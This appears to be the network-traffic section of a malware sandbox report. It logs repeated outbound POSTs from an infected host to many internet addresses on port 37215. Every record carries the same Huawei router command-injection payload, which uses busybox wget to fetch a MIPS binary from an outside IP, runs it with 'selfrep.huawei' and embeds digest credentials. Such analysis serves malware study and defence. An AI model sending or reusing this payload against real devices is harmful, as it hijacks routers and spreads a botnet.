                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1507192.168.2.134560241.4.91.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492286921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1508192.168.2.1358882157.27.41.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492295980 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1509192.168.2.1341452197.201.26.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492305994 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1510192.168.2.1356856157.91.122.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492343903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1511192.168.2.1357516197.131.119.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492362022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1512192.168.2.1340108197.8.148.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492362022 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1513192.168.2.1346592197.169.225.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492367983 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1514192.168.2.1357622126.234.202.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492386103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1515192.168.2.1356274197.74.231.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.492993116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1516192.168.2.133676041.200.68.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.493067026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 